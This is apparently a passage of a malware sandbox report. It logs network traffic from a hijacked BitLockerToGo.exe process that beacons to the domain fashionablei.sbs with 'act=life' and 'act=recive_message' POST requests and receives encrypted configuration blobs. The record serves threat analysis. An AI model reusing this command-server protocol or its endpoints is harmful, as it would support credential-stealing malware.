                                                                                                    Oct 24, 2024 14:42:25.877027988 CEST44349739188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.047750950 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.047790051 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.048012972 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.048259974 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.048278093 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.665571928 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.665708065 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.667026997 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.667036057 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.667375088 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.668667078 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.668781996 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.668821096 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:26.668890953 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:26.668915033 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:27.376718044 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:27.376827002 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:27.376913071 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:27.377058983 CEST49740443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:27.377079964 CEST44349740188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:27.790786028 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:27.790827990 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:27.790925026 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:27.791295052 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:27.791305065 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.392570972 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.392760992 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.394989014 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.394999981 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.395347118 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.397109032 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.397269011 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.397299051 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.726381063 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.726511955 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.726676941 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.726984024 CEST49741443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.727015018 CEST44349741188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.838062048 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.838092089 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:28.838469028 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.838545084 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:28.838550091 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.455632925 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.455784082 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:29.457192898 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:29.457201958 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.458482027 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.462093115 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:29.462244034 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:29.462275982 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.969664097 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.969798088 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:29.969888926 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:29.970135927 CEST49742443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:29.970159054 CEST44349742188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:30.123862028 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.123923063 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:30.124027967 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.124517918 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.124535084 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:30.749567032 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:30.749695063 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.752095938 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.752113104 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:30.752445936 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:30.758124113 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.758224964 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:30.758234978 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.244404078 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.244538069 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.244620085 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.244879961 CEST49743443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.244901896 CEST44349743188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.324563980 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.324605942 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.324719906 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.324980021 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.324996948 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.939812899 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.939932108 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.941056967 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.941065073 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.941405058 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:31.944439888 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.944514036 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:31.944519997 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:32.465854883 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:32.465991974 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:32.466065884 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:32.466265917 CEST49744443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:32.466285944 CEST44349744188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:32.493809938 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:32.493904114 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:32.493983984 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:32.494294882 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:32.494334936 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.104156971 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.104254007 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.105474949 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.105484009 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.105875969 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.107002974 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.107031107 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.107096910 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.574381113 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.574475050 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.574553013 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.574733973 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.574748039 CEST44349745188.114.96.3192.168.2.4
                                                                                                    Oct 24, 2024 14:42:33.574762106 CEST49745443192.168.2.4188.114.96.3
                                                                                                    Oct 24, 2024 14:42:33.574767113 CEST44349745188.114.96.3192.168.2.4
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 24, 2024 14:42:19.062889099 CEST5975153192.168.2.41.1.1.1
                                                                                                    Oct 24, 2024 14:42:19.077066898 CEST53597511.1.1.1192.168.2.4
                                                                                                    Oct 24, 2024 14:42:43.047709942 CEST5364870162.159.36.2192.168.2.4
                                                                                                    Oct 24, 2024 14:42:43.690521002 CEST53633381.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 24, 2024 14:42:19.062889099 CEST192.168.2.41.1.1.10xcdadStandard query (0)fashionablei.sbsA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 24, 2024 14:42:19.077066898 CEST1.1.1.1192.168.2.40xcdadNo error (0)fashionablei.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                    Oct 24, 2024 14:42:19.077066898 CEST1.1.1.1192.168.2.40xcdadNo error (0)fashionablei.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                    • fashionablei.sbs
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449736188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:19 UTC263OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 8
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                    Data Ascii: act=life
                                                                                                    2024-10-24 12:42:20 UTC1013INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:20 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=l7qfsa38fbn4kk9ren96dg9bqf; expires=Mon, 17 Feb 2025 06:28:59 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4QfazQF%2BdMOTVzq9x%2FeGMO9TzB%2BAeXMhq2hlVFjbPq9n90cZRPWdwLs28SszdbRXOePgcBYw%2BhmhmabES%2F9lzEBw3hZmcp4d%2Bl4IwrwVmZDGej5UBYApduhk3knyhSF4Y8D"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0bd20f936b73-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1033&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=2765998&cwnd=251&unsent_bytes=0&cid=5157626c3507ed67&ts=571&x=0"
                                                                                                    2024-10-24 12:42:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                    Data Ascii: 2ok
                                                                                                    2024-10-24 12:42:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449737188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:21 UTC264OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 75
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:21 UTC75OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                                                    Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--2&j=5c9b8674a630d9101b46733aa37f15ec
                                                                                                    2024-10-24 12:42:23 UTC1009INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:22 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=gu3e76mhabhe1b9dn8259vogev; expires=Mon, 17 Feb 2025 06:29:01 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aS54%2BlFF9b1zSAJr8aBU76ncPdP5gPvx3sC9%2Bn0PeMtpCSxbCPbxGvpuFpo8BQeBNWpS1wwoJYr9cXKBvT2fELzMXzDCHzz5Nwgl%2FmMDHg4Tx1q%2BW5IHzNZXTRlSACRwL8JX"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0bddfeea3ac5-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1306&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=975&delivery_rate=2115412&cwnd=235&unsent_bytes=0&cid=c73ba219fdc83f1e&ts=505&x=0"
                                                                                                    2024-10-24 12:42:23 UTC360INData Raw: 34 65 31 0d 0a 39 6d 4f 44 56 34 34 58 74 73 61 4e 52 38 53 55 35 37 70 5a 61 54 6c 63 73 35 7a 4a 6b 49 37 55 57 76 2b 32 72 36 34 32 44 72 4f 4e 51 66 56 31 74 43 4f 61 35 50 34 69 35 71 36 42 32 7a 55 61 58 48 43 52 2f 61 32 79 74 4c 49 37 6b 38 58 4b 67 68 52 34 33 74 52 5a 35 54 62 69 5a 4e 50 71 72 79 4b 38 74 74 33 68 49 6b 74 63 4d 70 47 6d 36 2f 58 6b 74 6a 75 54 31 4d 37 46 57 58 37 66 6c 51 76 76 4d 4f 5a 79 31 61 4c 73 4b 36 6e 78 67 74 38 34 41 31 63 31 33 76 53 6b 73 71 4c 32 50 34 57 55 6c 59 78 37 61 38 65 58 4c 75 49 6b 35 54 58 4c 36 76 5a 6c 6f 66 72 46 67 48 73 49 58 44 37 66 2b 71 33 37 35 72 77 79 6d 39 58 4c 78 45 5a 6e 31 5a 34 4c 34 54 50 6e 65 4e 79 32 34 53 47 75 2b 6f 54 56 4f 45 73 56 66 74 62 6d 36 36 71 73 35 51 71 65 78 64
                                                                                                    Data Ascii: 4e19mODV44XtsaNR8SU57pZaTlcs5zJkI7UWv+2r642DrONQfV1tCOa5P4i5q6B2zUaXHCR/a2ytLI7k8XKghR43tRZ5TbiZNPqryK8tt3hIktcMpGm6/XktjuT1M7FWX7flQvvMOZy1aLsK6nxgt84A1c13vSksqL2P4WUlYx7a8eXLuIk5TXL6vZlofrFgHsIXD7f+q375rwym9XLxEZn1Z4L4TPneNy24SGu+oTVOEsVftbm66qs5Qqexd
                                                                                                    2024-10-24 12:42:23 UTC896INData Raw: 74 2f 59 44 4b 4d 41 4a 57 4d 39 48 7a 6f 66 33 76 74 6a 2b 58 33 73 4c 47 55 47 48 63 6b 67 48 68 64 61 49 31 30 37 79 76 66 65 62 56 67 4d 67 38 42 30 31 38 36 37 36 30 76 50 58 32 50 35 47 55 6c 59 78 63 61 64 4b 58 43 75 34 32 35 48 37 47 70 50 30 6a 71 2f 4f 58 33 6a 34 46 55 54 33 44 39 4b 58 30 37 37 38 7a 6c 4e 48 4b 79 42 51 69 6b 5a 4d 5a 6f 57 32 73 56 4e 6d 76 34 79 2b 78 39 73 58 48 64 52 49 62 4f 64 32 2b 38 37 4c 6f 74 7a 79 63 30 4d 50 43 55 47 44 58 6d 67 7a 75 4d 2b 5a 31 30 36 37 6e 4c 61 66 37 6a 74 63 37 44 6c 59 36 31 2f 4b 71 39 36 7a 34 65 4a 72 4d 6a 5a 51 55 51 74 61 58 45 36 4d 41 37 33 76 61 6f 2f 6c 6c 75 62 69 63 6d 44 77 48 47 32 61 52 38 4b 37 39 2f 72 63 71 6d 4e 72 66 77 46 46 71 33 4a 63 50 34 54 44 72 65 4e 71 69 36 43
                                                                                                    Data Ascii: t/YDKMAJWM9Hzof3vtj+X3sLGUGHckgHhdaI107yvfebVgMg8B0186760vPX2P5GUlYxcadKXCu425H7GpP0jq/OX3j4FUT3D9KX0778zlNHKyBQikZMZoW2sVNmv4y+x9sXHdRIbOd2+87Lotzyc0MPCUGDXmgzuM+Z1067nLaf7jtc7DlY61/Kq96z4eJrMjZQUQtaXE6MA73vao/llubicmDwHG2aR8K79/rcqmNrfwFFq3JcP4TDreNqi6C
                                                                                                    2024-10-24 12:42:23 UTC1369INData Raw: 31 38 63 38 0d 0a 69 79 76 35 49 2f 55 4e 52 6c 57 4e 4e 54 77 70 2f 66 6a 74 6a 6d 63 32 73 66 48 46 43 4b 52 6b 78 6d 68 62 61 78 61 32 62 54 39 4c 36 33 6e 78 2b 30 34 42 56 55 35 78 37 36 30 76 50 58 32 50 35 47 55 6c 59 78 66 61 74 32 59 41 65 63 6e 34 6e 72 47 72 76 30 68 71 50 4b 4a 31 6a 49 47 56 44 76 44 2b 71 76 67 37 62 4d 2f 6b 39 6e 66 79 52 51 69 6b 5a 4d 5a 6f 57 32 73 54 2b 43 6a 2f 7a 53 68 74 4c 44 62 4e 51 56 63 4b 4a 48 68 35 65 75 73 73 54 54 64 6a 49 33 50 57 47 48 59 6b 51 37 7a 50 2b 42 30 78 71 50 6d 4c 4b 7a 33 69 39 63 77 42 31 34 73 32 76 47 6a 2f 65 32 37 4e 5a 62 51 7a 59 77 61 4c 4e 61 4d 51 62 6c 31 7a 58 6a 62 74 75 77 30 35 4d 4f 47 31 6a 55 4d 54 58 37 4f 73 4c 4b 79 36 37 70 34 78 5a 54 4d 77 46 68 74 33 70 49 4c 36 54
                                                                                                    Data Ascii: 18c8iyv5I/UNRlWNNTwp/fjtjmc2sfHFCKRkxmhbaxa2bT9L63nx+04BVU5x760vPX2P5GUlYxfat2YAecn4nrGrv0hqPKJ1jIGVDvD+qvg7bM/k9nfyRQikZMZoW2sT+Cj/zShtLDbNQVcKJHh5eussTTdjI3PWGHYkQ7zP+B0xqPmLKz3i9cwB14s2vGj/e27NZbQzYwaLNaMQbl1zXjbtuw05MOG1jUMTX7OsLKy67p4xZTMwFht3pIL6T
                                                                                                    2024-10-24 12:42:23 UTC1369INData Raw: 6f 4f 38 6f 72 66 69 4c 30 54 63 44 56 7a 6e 44 38 36 37 36 35 72 38 39 6b 64 6e 4f 33 6c 64 74 6b 64 70 42 35 69 32 73 4c 5a 53 44 33 42 4b 46 74 70 71 57 49 6b 74 63 4d 70 47 6d 36 2f 50 6b 73 54 61 5a 78 73 50 65 57 6d 76 52 6b 67 6e 70 4d 75 42 37 32 72 62 6e 4a 4b 62 34 69 74 41 79 44 31 6f 36 31 66 4b 73 73 71 4c 32 50 34 57 55 6c 59 78 38 62 38 75 4f 51 38 38 2b 37 48 4c 45 73 76 52 6c 75 62 69 63 6d 44 77 48 47 32 61 52 2b 71 44 34 35 62 55 78 6d 64 6e 4e 78 56 74 6c 32 5a 6b 4a 38 7a 54 6d 5a 39 43 68 37 69 71 73 38 6f 33 55 4e 41 64 66 4c 4e 71 2b 35 62 4c 72 72 6e 6a 46 6c 4f 33 48 51 6b 2f 44 68 6b 48 2b 65 2f 55 31 30 36 69 76 66 65 62 2f 69 64 6b 36 41 56 30 31 31 50 4f 72 39 2b 61 78 4e 4a 33 55 7a 73 70 53 59 64 6d 63 44 65 30 32 34 58 44
                                                                                                    Data Ascii: oO8orfiL0TcDVznD86765r89kdnO3ldtkdpB5i2sLZSD3BKFtpqWIktcMpGm6/PksTaZxsPeWmvRkgnpMuB72rbnJKb4itAyD1o61fKssqL2P4WUlYx8b8uOQ88+7HLEsvRlubicmDwHG2aR+qD45bUxmdnNxVtl2ZkJ8zTmZ9Ch7iqs8o3UNAdfLNq+5bLrrnjFlO3HQk/DhkH+e/U106ivfeb/idk6AV011POr9+axNJ3UzspSYdmcDe024XD
                                                                                                    2024-10-24 12:42:23 UTC1369INData Raw: 36 6a 33 67 39 51 32 53 78 56 2b 31 75 62 72 71 71 79 52 49 70 44 53 32 74 31 68 61 39 48 46 51 66 35 37 39 54 58 54 71 4b 39 39 35 76 75 4a 30 6a 59 4f 58 7a 62 57 2f 61 72 2b 36 4c 73 31 6d 64 33 4a 79 55 5a 2b 31 35 6f 42 37 6a 76 6a 65 63 61 71 36 69 57 71 74 73 75 59 50 42 4d 62 5a 70 48 50 76 50 4b 73 71 58 61 45 6c 4d 72 41 46 44 53 52 6d 77 7a 7a 4f 65 4e 31 31 61 66 72 4c 71 48 77 67 39 6b 34 44 6c 67 37 31 2f 2b 72 2f 75 61 78 4d 4a 66 61 77 4d 70 51 61 74 66 55 54 36 45 79 39 44 57 4d 35 4e 30 6f 71 50 2b 47 33 6a 59 64 63 77 2b 52 34 65 58 72 72 4c 45 30 33 59 79 4e 79 46 39 6b 33 5a 45 4a 35 44 54 6b 66 39 79 72 34 44 65 6e 2b 59 7a 66 4d 41 5a 55 4d 4e 54 77 75 66 58 6e 76 54 43 55 32 73 75 4d 47 69 7a 57 6a 45 47 35 64 64 70 32 32 71 2f 2b
                                                                                                    Data Ascii: 6j3g9Q2SxV+1ubrqqyRIpDS2t1ha9HFQf579TXTqK995vuJ0jYOXzbW/ar+6Ls1md3JyUZ+15oB7jvjecaq6iWqtsuYPBMbZpHPvPKsqXaElMrAFDSRmwzzOeN11afrLqHwg9k4Dlg71/+r/uaxMJfawMpQatfUT6Ey9DWM5N0oqP+G3jYdcw+R4eXrrLE03YyNyF9k3ZEJ5DTkf9yr4Den+YzfMAZUMNTwufXnvTCU2suMGizWjEG5ddp22q/+
                                                                                                    2024-10-24 12:42:23 UTC1369INData Raw: 66 5a 4e 45 73 56 66 74 62 6d 36 36 71 73 68 79 36 61 30 38 4b 4f 66 57 76 4b 6c 51 76 69 50 75 41 31 79 2b 72 32 5a 61 48 36 78 59 42 37 42 6c 63 7a 31 65 79 6e 38 75 79 2f 50 35 66 47 77 73 4e 5a 62 39 47 52 45 2b 41 6e 34 33 37 52 70 2b 73 71 71 66 71 4e 30 6e 74 46 47 7a 6e 4a 76 76 4f 79 77 4c 55 70 6c 35 62 71 31 6b 4a 72 33 59 55 4b 37 44 6d 73 61 70 71 39 72 79 4b 71 74 74 32 59 4f 77 70 57 4c 4e 54 2f 6f 66 6a 68 76 6a 65 59 30 63 4c 49 55 47 66 66 68 67 2f 75 4e 65 70 2b 31 61 48 73 4c 71 7a 34 6a 4d 70 37 52 52 73 35 79 62 37 7a 73 73 61 74 4f 5a 44 59 6a 2b 4a 66 65 74 62 57 49 4f 38 2b 36 33 6e 43 35 50 42 72 76 37 61 43 31 48 74 54 47 7a 66 66 38 71 6a 31 35 4c 34 39 6e 64 2f 4e 77 31 35 69 31 6f 59 4c 37 54 2f 2b 65 74 65 70 36 79 69 73 38
                                                                                                    Data Ascii: fZNEsVftbm66qshy6a08KOfWvKlQviPuA1y+r2ZaH6xYB7Blcz1eyn8uy/P5fGwsNZb9GRE+An437Rp+sqqfqN0ntFGznJvvOywLUpl5bq1kJr3YUK7Dmsapq9ryKqtt2YOwpWLNT/ofjhvjeY0cLIUGffhg/uNep+1aHsLqz4jMp7RRs5yb7zssatOZDYj+JfetbWIO8+63nC5PBrv7aC1HtTGzff8qj15L49nd/Nw15i1oYL7T/+etep6yis8
                                                                                                    2024-10-24 12:42:23 UTC876INData Raw: 44 53 54 32 52 73 4f 76 31 39 50 5a 67 33 65 62 48 7a 31 68 36 33 4a 74 42 2f 6e 76 31 4e 64 4f 6f 72 33 33 6d 35 4a 66 59 4d 41 74 63 4d 4d 50 2f 6f 2f 33 6d 74 6a 36 57 33 73 37 46 55 47 4c 59 6b 67 44 73 4e 4f 31 31 30 61 54 6d 4e 36 75 32 79 35 67 38 45 78 74 6d 6b 63 6d 6e 2b 64 32 31 4c 74 33 4c 67 39 55 55 61 39 33 55 57 61 45 30 2f 6e 6a 63 6f 4f 38 6f 6f 50 32 45 32 54 67 4c 57 7a 33 52 2b 36 44 39 36 72 45 31 6c 39 33 45 33 6c 78 6f 77 35 51 4e 35 58 57 69 4e 64 4f 38 72 33 33 6d 78 6f 62 54 4e 77 74 57 4b 35 48 68 35 65 75 73 73 54 54 64 6a 49 33 45 58 32 66 58 6e 77 4c 69 4f 2b 64 2f 32 36 76 6c 49 36 44 2b 67 4e 67 33 43 31 34 34 31 66 71 6c 39 65 4b 37 4f 59 2f 58 78 49 77 61 4c 4e 61 4d 51 62 6c 31 7a 48 37 43 6f 65 67 7a 35 4d 4f 47 31 6a
                                                                                                    Data Ascii: DST2RsOv19PZg3ebHz1h63JtB/nv1NdOor33m5JfYMAtcMMP/o/3mtj6W3s7FUGLYkgDsNO110aTmN6u2y5g8Extmkcmn+d21Lt3Lg9UUa93UWaE0/njcoO8ooP2E2TgLWz3R+6D96rE1l93E3lxow5QN5XWiNdO8r33mxobTNwtWK5Hh5eussTTdjI3EX2fXnwLiO+d/26vlI6D+gNg3C1441fql9eK7OY/XxIwaLNaMQbl1zH7Coegz5MOG1j
